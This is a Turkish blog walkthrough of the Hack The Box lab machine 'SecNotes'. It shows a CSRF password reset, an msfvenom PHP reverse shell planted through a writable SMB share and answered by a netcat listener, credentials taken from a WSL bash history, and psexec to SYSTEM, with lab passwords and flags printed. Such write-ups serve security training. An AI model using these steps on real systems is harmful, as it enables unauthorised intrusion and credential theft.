İçeriğe geç

SecNotes

Tarih: 11/01/2022 | Yazar: kuday
Makine Adı Seviye OS Logo
SecNotes - HTB Medium Linux

Walkthrough

CSRF ile ilgili güzel bir makine olduğunu düşünüyorum. Makine IP adresi 10.10.10.97 ve ne yazıkki nmap taramasının sonuçlarını not etmeyi unutmuşum. İnternet sayfasına gittiğimizde bir login ekranı ile karşılaşıyoruz. Bazı bruteforce denemeleri gerçekleştirdim ancak başarılı olamadım. Bunun üzerine bir hesap oluşturmayı denedim. İçeri girdikten sonra admine mesaj gönder gibi bir yer vardı ve burada csrf olabileceği aklıma geldi. Senaryo gereği sanırsam arkada birileri sürekli gönderilen linklere tıklıyor. Buda aslında CSRF ile ilgili bir makine olduğundan dolayı düşünmemiz gerekekn ibr şey. Bunu test etmek için kendim bir sunucu ayağa kaldırdım ve kendi ip mi link olarak verdim. Sonuç aşağıdaki gibi:

┌──(root💀kali)-[/var/log/apache2]
└─# tail -f access.log
10.10.10.97 - - [02/Jan/2022:07:31:12 -0500] "GET /index.php?acaba=asdasdasdasd HTTP/1.1" 200 203 "-" "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.228"

Harika! Bu esnadan internet sitesini test etmeye başladım ve CSRF ile neleri manipüle edebilirim diye sordum. Parola değiştirme kısmında normalde POST ile işlem yapıyoruz ancak aynı endpoint GET ile de çalışmakta. Bu yüzden aslında admin'in parolasını değiştirebileceğimi farkettim.

http://10.10.10.97/change_pass.php?password=password&confirm_password=password&submit=submit

İçeri girdikten sonra tyler kullanıcısının notlarında bir credential buldum.

\\secnotes.htb\new-site
tyler / 92g!mA8BGjOirkL%OG*&

Bu bilgilerle smb üzerinden enumaration işlemi yaptım.

┌──(root💀kali)-[~/10.10.10.97]
└─# crackmapexec smb 10.10.10.97 -u 'tyler' -p '92g!mA8BGjOirkL%OG*&' --shares
SMB         10.10.10.97     445    SECNOTES         [*] Windows 10 Enterprise 17134 (name:SECNOTES) (domain:SECNOTES) (signing:False) (SMBv1:True)
SMB         10.10.10.97     445    SECNOTES         [+] SECNOTES\tyler:92g!mA8BGjOirkL%OG*& 
SMB         10.10.10.97     445    SECNOTES         [+] Enumerated shares
SMB         10.10.10.97     445    SECNOTES         Share           Permissions     Remark
SMB         10.10.10.97     445    SECNOTES         -----           -----------     ------
SMB         10.10.10.97     445    SECNOTES         ADMIN$                          Remote Admin
SMB         10.10.10.97     445    SECNOTES         C$                              Default share
SMB         10.10.10.97     445    SECNOTES         IPC$                            Remote IPC
SMB         10.10.10.97     445    SECNOTES         new-site        READ,WRITE

Portların birinde de IIS vardı ve php çalışıyordu. READ-WRITE yetkimin olduğu bu kısmın IIS'in kök diziniydi. Bende buraya reverse shell attım ve tetikledim.

mount -t cifs -o 'username=tyler,password=92g!mA8BGjOirkL%OG*&' //10.10.10.97/new-site /mnt/10.10.10.97 
┌──(root💀kali)-[/mnt/10.10.10.97]
└─# echo "deneme" > deneme.txt  
┌──(root💀kali)-[/mnt/10.10.10.97]                  
└─# curl http://10.10.10.97:8808/deneme.txt                                                                                                                                                                        
deneme 
┌──(root💀kali)-[/mnt/10.10.10.97]
└─# msfvenom -p php/reverse_php LHOST=10.10.14.26 LPORT=80 -f raw > shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 3021 bytes
┌──(root💀kali)-[~]┌──(root💀kali)-[~]
└─# nc -lvp 80
listening on [any] 80 ...
connect to [10.10.14.26] from secnotes.htb [10.10.10.97] 54317
Microsoft Windows [Version 10.0.17134.228]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\inetpub\new-site>

C:\Users\tyler\Desktop>type user.txt
type user.txt
f377be8e7e089b76668b921cd78c191c

Daha sonrasında içeride otomatik araçları çalıştırdım ve aşağıdaki sonucu buldum.

͹ Analyzing PGP-GPG Files (limit 70)
    'C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\usr\share\popularity-contest\debian-popcon.gpg' - content:

    'C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\usr\share\keyrings\ubuntu-master-keyring.gpg' - content:

    'C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\usr\share\keyrings\ubuntu-fips-updates-keyring.gpg' - content:

    'C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\usr\share\keyrings\ubuntu-fips-keyring.gpg' - content:

    'C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\usr\share\keyrings\ubuntu-esm-keyring.gpg' - content:

    'C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\usr\share\keyrings\ubuntu-cloudimage-removed-keys.gpg' - content:

    'C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\usr\share\keyrings\ubuntu-cloudimage-keyring.gpg' - content:

    'C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\usr\share\keyrings\ubuntu-archive-removed-keys.gpg' - content:

    'C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\usr\share\keyrings\ubuntu-archive-keyring.gpg' - content:

    'C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\usr\share\gnupg\distsigkey.gpg' - content:

    'C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\etc\apt\trusted.gpg.d\ubuntu-keyring-2012-cdimage.gpg' - content:

    'C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\etc\apt\trusted.gpg.d\ubuntu-keyring-2012-archive.gpg' - content:

    'C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\usr\share\doc\cryptsetup\README.gnupg' - content:

͹ Looking for Linux shells/distributions - wsl.exe, bash.exe
    C:\Windows\System32\wsl.exe                                                                                                                                                                                    
    C:\Windows\System32\bash.exe        

    Found installed WSL distribution(s) - listed below
    Run linpeas.sh in your WSL distribution(s) home folder(s).                                                                                                                                                     

    Distribution:      "Ubuntu-18.04"                                                                                                                                                                              
    Root directory:    "C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs"
    Run command:       wsl.exe --distribution "Ubuntu-18.04"

Bunun üzerine linux'un olduğu kısma gittim.


C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\root>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 1E7B-9B76

 Directory of C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\root

06/22/2018  01:44 PM    <DIR>          .
06/22/2018  01:44 PM    <DIR>          ..
06/22/2018  02:09 AM             3,112 .bashrc
06/22/2018  01:41 PM               398 .bash_history
06/21/2018  05:00 PM               148 .profile
06/22/2018  01:56 AM    <DIR>          filesystem
               3 File(s)          3,658 bytes
               3 Dir(s)  13,302,255,616 bytes free

C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\root>type .bash_history
type .bash_history
cd /mnt/c/
ls
cd Users/
cd /
cd ~
ls
pwd
mkdir filesystem
mount //127.0.0.1/c$ filesystem/
sudo apt install cifs-utils
mount //127.0.0.1/c$ filesystem/
mount //127.0.0.1/c$ filesystem/ -o user=administrator
cat /proc/filesystems
sudo modprobe cifs
smbclient
apt install smbclient
smbclient
smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$
> .bash_history 
less .bash_history
exit
C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\root>

Test ettim.


┌──(root💀kali)-[~/10.10.10.97]
└─# crackmapexec smb 10.10.10.97 -u 'Administrator' -p 'u6!4ZwgwOM#^OBf#Nwnh'
SMB         10.10.10.97     445    SECNOTES         [*] Windows 10 Enterprise 17134 (name:SECNOTES) (domain:SECNOTES) (signing:False) (SMBv1:True)
SMB         10.10.10.97     445    SECNOTES         [+] SECNOTES\Administrator:u6!4ZwgwOM#^OBf#Nwnh (Pwn3d!)

Bağlandım.


┌──(root💀kali)-[~]
└─# python3 /usr/share/doc/python3-impacket/examples/psexec.py SECNOTES/[email protected]
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[*] Requesting shares on 10.10.10.97.....
[*] Found writable share ADMIN$
[*] Uploading file KkXYgZko.exe
[*] Opening SVCManager on 10.10.10.97.....
[*] Creating service ecHR on 10.10.10.97.....
[*] Starting service ecHR.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17134.228]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
nt authority\system

C:\WINDOWS\system32>cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>type root.txt
360864a130968188e3fa3056caef370f
Kategori:Walkthrough

İlk Yorumu Siz Yapın

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir